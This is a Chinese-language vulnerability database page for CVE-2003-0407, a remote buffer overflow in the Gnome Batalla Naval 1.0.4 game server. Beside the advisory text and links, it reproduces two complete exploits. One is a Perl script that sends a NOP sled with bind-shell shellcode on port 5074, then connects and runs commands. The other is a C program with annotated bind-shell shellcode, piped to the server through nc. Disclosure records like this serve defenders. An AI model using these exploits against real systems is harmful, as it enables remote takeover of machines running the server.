CVE-2003-0407
CVSS10.0
发布时间 :2003-06-30 00:00:00
修订时间 :2016-10-17 22:33:36
NMCOES    

[原文]Buffer overflow in gbnserver for Gnome Batalla Naval 1.0.4 allows remote attackers to execute arbitrary code via a long connection string.


[CNNVD]Batalla Naval远程缓冲区溢出漏洞(CNNVD-200306-122)

        Gnome Batalla Naval 1.0.4版本的gbnserver存在缓冲区溢出漏洞。远程攻击者借助一个超长连接字符串执行任意代码。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0407
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0407
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200306-122
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=105405668423102&w=2
(UNKNOWN)  BUGTRAQ  20030526 [Priv8security_Advisory]_Batalla_Naval_remote_overflow
http://www.iss.net/security_center/static/12087.php
(VENDOR_ADVISORY)  XF  batalla-naval-bo(12087)
http://www.securityfocus.com/bid/7699
(VENDOR_ADVISORY)  BID  7699

- 漏洞信息

Batalla Naval远程缓冲区溢出漏洞
危急 缓冲区溢出
2003-06-30 00:00:00 2005-10-20 00:00:00
远程  
        Gnome Batalla Naval 1.0.4版本的gbnserver存在缓冲区溢出漏洞。远程攻击者借助一个超长连接字符串执行任意代码。

- 公告与补丁

        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- 漏洞信息 (22658)

Batalla Naval 1.0 4 Remote Buffer Overflow Vulnerability (1) (EDBID:22658)
linux remote
2003-05-26 Verified
0 wsxz
N/A [点击下载]
source: http://www.securityfocus.com/bid/7699/info

Batalla Naval is prone to a remotely exploitable buffer overflow when handling requests of excessive length. This could allow for execution of malicious instructions in the context of the game server. 

#!/usr/bin/perl
# Priv8security.com remote exploit for Gnome Batalla Naval Server v1.0.4
#
#    Game url http://batnav.sourceforge.net/
#    Tested against Mandrake 9.0
#
#    [wsxz@localhost buffer]$ perl priv8gbn.pl 127.0.0.1
#    Connected!
#    [+] Using ret address: 0xbffff3a2
#    [+] Using got address: 0x804f8dc
#    [+] Sending stuff...
#    [+] Done ;pPPp
#    [?] Now lets see if we got a shell...
#    [+] Enjoy your stay on this server =)
#    Linux wsxz.box 2.4.21-0.13mdk #1 Fri Mar 14 15:08:06 EST 2003
i686 unknown unknown GNU/Linux
#    uid=503(wsxz) gid=503(wsxz) groups=503(wsxz)
#

use IO::Socket;
if (@ARGV < 1 || @ARGV > 3) {
print "-= Priv8security.com remote gbatnav-1.0.4 server on linux =-\n";
print "Usage: perl $0 <host> <port=1995> <offset=100>\n";
exit;
}
if (@ARGV >= 2) {
$port = $ARGV[1];
$offset = $ARGV[2];
} else {
$port = 1995;
$offset = 0;
}
$shellcode = #bind shellcode port 5074 by s0t4ipv6@shellcode.com.ar
"\x31\xc0\x50\x40\x89\xc3\x50\x40\x50\x89\xe1\xb0\x66".
"\xcd\x80\x31\xd2\x52\x66\x68\x13\xd2\x43\x66\x53\x89\xe1".
"\x6a\x10\x51\x50\x89\xe1\xb0\x66\xcd\x80\x40\x89\x44\x24\x04".
"\x43\x43\xb0\x66\xcd\x80\x83\xc4\x0c\x52\x52\x43\xb0\x66".
"\xcd\x80\x93\x89\xd1\xb0\x3f\xcd\x80\x41\x80\xf9\x03\x75\xf6".
"\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53".
"\x89\xe1\xb0\x0b\xcd\x80";

$ret = 0xbffff3a2; # ret mdk 9.0
$gotaddr = 0x0804f8dc; #objdump -R ./gbnserver | grep strcpy
$new_ret = pack('l', ($ret + $offset));
$new_got = pack('l', ($gotaddr));
$buffer .= "\x90" x (500 - length($shellcode));
$buffer .= $shellcode;
$buffer .= $new_got;
$buffer .= $new_ret x 20;



$f = IO::Socket::INET->new(Proto=>"tcp",
PeerHost=>$ARGV[0],PeerPort=>$port)
or die "Cant connect to server or port...\n";

print "Connected!\n";
print "[+] Using ret address: 0x", sprintf('%lx',($ret)), "\n";
print "[+] Using got address: 0x", sprintf('%lx',($gotaddr)), "\n";
print "[+] Sending stuff...\n";
print $f "$buffer\r\n\r\n";
print "[+] Done ;pPPp\n";
print "[?] Now lets see if we got a shell...\n";
close($f);

$handle = IO::Socket::INET->new(Proto=>"tcp",
PeerHost=>$ARGV[0],PeerPort=>5074,Type=>SOCK_STREAM,Reuse=>1)
or die "[-] No luck, try next time ok ...\n";

print "[+] Enjoy your stay on this server =)\n";

$handle->autoflush(1);
print $handle "uname -a;id\n";

    # split the program into two processes, identical twins
    die "cant fork: $!" unless defined($kidpid = fork());

    # the if{} block runs only in the parent process
    if ($kidpid) {
        # copy the socket to standard output
        while (defined ($line = <$handle>)) {
            print STDOUT $line;
        }
        kill("TERM", $kidpid);  # send SIGTERM to child
    }
    # the else{} block runs only in the child process
    else {
        # copy standard input to the socket
        while (defined ($line = <STDIN>)) {
            print $handle $line;
        }
    }
		

- 漏洞信息 (22659)

Batalla Naval 1.0 4 Remote Buffer Overflow Vulnerability (2) (EDBID:22659)
linux remote
2003-05-26 Verified
0 jsk
N/A [点击下载]
source: http://www.securityfocus.com/bid/7699/info
 
Batalla Naval is prone to a remotely exploitable buffer overflow when handling requests of excessive length. This could allow for execution of malicious instructions in the context of the game server. 

/*
 *by jsk for gbnserver remote exploit demo
 * example:(./gbnex;cat )|nc 127.0.0.1 1995
 * ctrol c
 * ./nc 127.0.0.1 30464
 * id
 * uid=508(sa2) gid=508(sa2) groups=508(sa2)
 *2003-6-2
 *welcome to http://www.ph4nt0m.net & www.patching.net
 *ths warning3
 */
#include <stdlib.h>
#include <unistd.h>

#define NOP        0x90

#define OFFSET     100

#define bufsize    584

char shellcode[] =

        "\x31\xc0"                      /* xorl %eax,%eax        */
        "\xb0\x02"                      /* movb $0x2,%al         */
        "\xcd\x80"                      /* int $0x80             */
        "\x85\xc0"                      /* testl %eax,%eax       */
        "\x75\x43"                      /* jne 0x43              */
        "\xeb\x43"                      /* jmp 0x43              */
        "\x5e"                          /* popl %esi             */
        "\x31\xc0"                      /* xorl %eax,%eax        */
        "\x31\xdb"                      /* xorl %ebx,%ebx        */
        "\x89\xf1"                      /* movl %esi,%ecx        */
        "\xb0\x02"                      /* movb $0x2,%al         */
        "\x89\x06"                      /* movl %eax,(%esi)      */
        "\xb0\x01"                      /* movb $0x1,%al         */
        "\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
        "\xb0\x06"                      /* movb $0x6,%al         */
        "\x89\x46\x08"                  /* movl %eax,0x8(%esi)   */
        "\xb0\x66"                      /* movb $0x66,%al        */
        "\xb3\x01"                      /* movb $0x1,%bl         */
        "\xcd\x80"                      /* int $0x80             */
        "\x89\x06"                      /* movl %eax,(%esi)      */
        "\xb0\x02"                      /* movb $0x2,%al         */
        "\x66\x89\x46\x0c"              /* movw %ax,0xc(%esi)    */
        "\xb0\x77"                      /* movb $0x77,%al        */
        "\x66\x89\x46\x0e"              /* movw %ax,0xe(%esi)    */
        "\x8d\x46\x0c"                  /* leal 0xc(%esi),%eax   */
        "\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
        "\x31\xc0"                      /* xorl %eax,%eax        */
        "\x89\x46\x10"                  /* movl %eax,0x10(%esi)  */
        "\xb0\x10"                      /* movb $0x10,%al        */
        "\x89\x46\x08"                  /* movl %eax,0x8(%esi)   */
        "\xb0\x66"                      /* movb $0x66,%al        */
        "\xb3\x02"                      /* movb $0x2,%bl         */
        "\xcd\x80"                      /* int $0x80             */
        "\xeb\x04"                      /* jmp 0x4               */
        "\xeb\x55"                      /* jmp 0x55              */
        "\xeb\x5b"                      /* jmp 0x5b              */
        "\xb0\x01"                      /* movb $0x1,%al         */
        "\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
        "\xb0\x66"                      /* movb $0x66,%al        */
        "\xb3\x04"                      /* movb $0x4,%bl         */
        "\xcd\x80"                      /* int $0x80             */
        "\x31\xc0"                      /* xorl %eax,%eax        */
        "\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
        "\x89\x46\x08"                  /* movl %eax,0x8(%esi)   */
        "\xb0\x66"                      /* movb $0x66,%al        */
        "\xb3\x05"                      /* movb $0x5,%bl         */
        "\xcd\x80"                      /* int $0x80             */
        "\x88\xc3"                      /* movb %al,%bl          */
        "\xb0\x3f"                      /* movb $0x3f,%al        */
        "\x31\xc9"                      /* xorl %ecx,%ecx        */
        "\xcd\x80"                      /* int $0x80             */
        "\xb0\x3f"                      /* movb $0x3f,%al        */
        "\xb1\x01"                      /* movb $0x1,%cl         */
        "\xcd\x80"                      /* int $0x80             */
        "\xb0\x3f"                      /* movb $0x3f,%al        */
        "\xb1\x02"                      /* movb $0x2,%cl         */
        "\xcd\x80"                      /* int $0x80             */
        "\xb8\x2f\x62\x69\x6e"          /* movl $0x6e69622f,%eax */
        "\x89\x06"                      /* movl %eax,(%esi)      */
        "\xb8\x2f\x73\x68\x2f"          /* movl $0x2f68732f,%eax */
        "\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
        "\x31\xc0"                      /* xorl %eax,%eax        */
        "\x88\x46\x07"                  /* movb %al,0x7(%esi)    */
        "\x89\x76\x08"                  /* movl %esi,0x8(%esi)   */
        "\x89\x46\x0c"                  /* movl %eax,0xc(%esi)   */
        "\xb0\x0b"                      /* movb $0xb,%al         */
        "\x89\xf3"                      /* movl %esi,%ebx        */
        "\x8d\x4e\x08"                  /* leal 0x8(%esi),%ecx   */
        "\x8d\x56\x0c"                  /* leal 0xc(%esi),%edx   */
        "\xcd\x80"                      /* int $0x80             */
        "\x31\xc0"                      /* xorl %eax,%eax        */
        "\xb0\x01"                      /* movb $0x1,%al         */
        "\x31\xdb"                      /* xorl %ebx,%ebx        */
        "\xcd\x80"                      /* int $0x80             */
        "\xe8\x5b\xff\xff\xff";

int main()

{

    long offset = 0;

    int ret;

    u_char buf[bufsize];

    memset(buf, NOP, bufsize);





    memcpy(&buf[bufsize-(strlen(shellcode)+21*sizeof
(ret))],shellcode,strlen(shellcode));

    ret =  0xbfffde8c;

    memcpy(&buf[bufsize-(sizeof(ret))], &ret, sizeof(ret));

    memcpy(&buf[bufsize-(2*sizeof(ret))], &ret, sizeof(ret));

    memcpy(&buf[bufsize-(3*sizeof(ret))], &ret, sizeof(ret));

    memcpy(&buf[bufsize-(4*sizeof(ret))], &ret, sizeof(ret));

    memcpy(&buf[bufsize-(5*sizeof(ret))], &ret, sizeof(ret));

    memcpy(&buf[bufsize-(6*sizeof(ret))], &ret, sizeof(ret));

    memcpy(&buf[bufsize-(7*sizeof(ret))], &ret, sizeof(ret));

    memcpy(&buf[bufsize-(8*sizeof(ret))], &ret, sizeof(ret));

    memcpy(&buf[bufsize-(9*sizeof(ret))], &ret, sizeof(ret));

    memcpy(&buf[bufsize-(10*sizeof(ret))], &ret, sizeof(ret));

    memcpy(&buf[bufsize-(11*sizeof(ret))], &ret, sizeof(ret));

    memcpy(&buf[bufsize-(12*sizeof(ret))], &ret, sizeof(ret));

    memcpy(&buf[bufsize-(13*sizeof(ret))], &ret, sizeof(ret));

    memcpy(&buf[bufsize-(14*sizeof(ret))], &ret, sizeof(ret));

    memcpy(&buf[bufsize-(15*sizeof(ret))], &ret, sizeof(ret));

    memcpy(&buf[bufsize-(16*sizeof(ret))], &ret, sizeof(ret));

    memcpy(&buf[bufsize-(17*sizeof(ret))], &ret, sizeof(ret));

    memcpy(&buf[bufsize-(18*sizeof(ret))], &ret, sizeof(ret));

    memcpy(&buf[bufsize-(19*sizeof(ret))], &ret, sizeof(ret));

    memcpy(&buf[bufsize-(20*sizeof(ret))], &ret, sizeof(ret));

    memcpy(&buf[bufsize-(21*sizeof(ret))], &ret, sizeof(ret));



printf("%s\n",buf);

}

		

- 漏洞信息

6553
Gnome Batalla Naval gbnserver Remote Overflow
Remote / Network Access Denial of Service, Input Manipulation
Loss of Integrity, Loss of Availability
Exploit Public

- 漏洞描述

A remote overflow exists in Gnome Batalla Naval gbnserver. The issue is due to a boundary error in gbnserver. By sending an overly long string, an attacker can cause a buffer overflow and crash the server or execute arbitrary code with game server user privileges, resulting in a loss of integrity.

- 时间线

2003-05-26 Unknow
2003-05-26 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

- 漏洞信息

Batalla Naval Remote Buffer Overflow Vulnerability
Boundary Condition Error 7699
Yes No
2003-05-26 12:00:00 2009-07-11 10:06:00
Discovery of this issue is credited to Wsxz <wsxz@priv8security.com>.

- 受影响的程序版本

Batalla Naval Batalla Naval 1.0 4

- 漏洞讨论

Batalla Naval is prone to a remotely exploitable buffer overflow when handling requests of excessive length. This could allow for execution of malicious instructions in the context of the game server.

- 漏洞利用

The following exploits were provided by Wsxz &lt;wsxz@priv8security.com&gt; and yan feng &lt;yfjsk1982@yahoo.com.cn&gt; respectively:

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站